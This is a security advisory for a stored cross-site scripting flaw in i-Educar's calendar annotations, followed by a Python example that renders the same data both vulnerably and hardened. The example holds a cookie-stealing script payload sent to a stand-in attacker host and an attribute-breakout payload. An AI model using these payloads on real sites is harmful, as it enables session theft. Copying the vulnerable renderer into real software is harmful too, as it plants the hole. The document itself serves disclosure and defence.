Key Information

Vulnerability ID: CVE-2025-10584
Vulnerability Type: Cross-Site Scripting (XSS), stored
Affected System: i-Educar system's file

Vulnerability Description

During analysis of the calendar registration functionality, two stored XSS vulnerabilities were identified. The and parameters do not validate user input and are rendered back without output encoding, so a malicious script submitted once is stored server-side and executes automatically in the browser of every user who later opens the page that displays it. No further interaction with the victim is required beyond viewing the page.

Technical Details

Vulnerable Endpoint:
Affected Parameters: and
Trigger Page:

Exploitation Method

- Access the vulnerable endpoint and click "New Calendar in List".
- On the new page, click "New Annotation".
- Insert the payload into the "Nome" and "Descrição" fields.
- Click "Save". The payload is stored and runs whenever the trigger page is rendered.

Impact

Because the script runs in the origin of the application with the privileges of the viewing user, this stored XSS can be exploited to:
- Steal session cookies to hijack user sessions (where the session cookie is not marked HttpOnly; even then, the attacker can issue requests in the victim's session from within the page).
- Capture keystrokes entered on the affected page.
- Steal credentials by injecting fake login forms or harvesting browser-autofilled values.
- Redirect users to malicious websites.
- Tamper with the application interface.
- Damage brand reputation.

Conclusion

Even seemingly harmless fields, such as internal annotations, can serve as carriers for stored XSS. When they are displayed in administrative panels without context-aware output encoding, they introduce new threats to every administrator who views them. The primary control is to encode every stored value for the HTML context it is rendered into (element content, quoted attribute, URL, or JavaScript), regardless of how trivial the field may appear; input validation and a restrictive Content-Security-Policy are worthwhile defence-in-depth, but neither replaces output encoding.
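The following is an added example, not i-Educar's own code (i-Educar is a PHP application; the pattern is shown here in Python). It reproduces the flow the advisory describes: an annotation with a payload in its "Nome" and "Descrição" fields is stored unvalidated, then rendered by a vulnerable template and by a hardened one. The field names `nome` and `descricao`, the in-memory store, the templates and the payload are all assumptions constructed for illustration; the parser-based `active_content` check is only there to make the difference between the two renderings verifiable offline.

```python
"""Stored XSS in a calendar-annotation form: vulnerable rendering beside
the hardened form (added example; not i-Educar's code)."""
import html
from html.parser import HTMLParser

# Constructed sample of what an attacker would submit. The "nome" payload
# targets element content; the "descricao" payload breaks out of a quoted
# attribute and adds an event handler.
ANNOTATION_PAYLOAD = {
    "nome": '<script>location="https://attacker.example/?c="+document.cookie</script>',
    "descricao": '" onmouseover="alert(document.domain)" x="',
}

# In-memory stand-in for the annotations table (constructed).
_annotations: dict[int, dict] = {}


def save_annotation(nome: str, descricao: str) -> int:
    """Store the annotation exactly as submitted (no validation), as the
    advisory describes, and return its id."""
    aid = len(_annotations) + 1
    _annotations[aid] = {"id": aid, "nome": nome, "descricao": descricao}
    return aid


def get_annotation(aid: int) -> dict:
    return _annotations[aid]


def render_vulnerable(annotation: dict) -> str:
    """Concatenate stored values straight into HTML: stored XSS."""
    return (f'<li title="{annotation["descricao"]}">'
            f'{annotation["nome"]}</li>')


def render_hardened(annotation: dict) -> str:
    """Encode each value for the HTML context it lands in. html.escape with
    quote=True covers element content and *quoted* attribute values; the
    attribute must stay quoted in the template for this to hold."""
    return (f'<li title="{html.escape(annotation["descricao"], quote=True)}">'
            f'{html.escape(annotation["nome"], quote=True)}</li>')


class _ActiveContentFinder(HTMLParser):
    """Collect script elements and on* event-handler attributes as the
    browser's parser would see them (entities in attribute values are
    decoded, so encoded text never becomes an attribute)."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")


def active_content(rendered: str) -> list[str]:
    """Return the active markup present in a rendered fragment."""
    finder = _ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    aid = save_annotation(**ANNOTATION_PAYLOAD)
    ann = get_annotation(aid)
    print("vulnerable:", render_vulnerable(ann))
    print("  active:", active_content(render_vulnerable(ann)))
    print("hardened:  ", render_hardened(ann))
    print("  active:", active_content(render_hardened(ann)))
```

Run stand-alone, the vulnerable rendering yields a live `onmouseover` handler and a `<script>` element, while the hardened rendering contains only `&lt;script&gt;` text and a `title` attribute whose value happens to look like markup. Note that `html.escape` is correct only for HTML element content and quoted attributes; a value placed into a JavaScript string, a URL, or an unquoted attribute needs the encoder for that context.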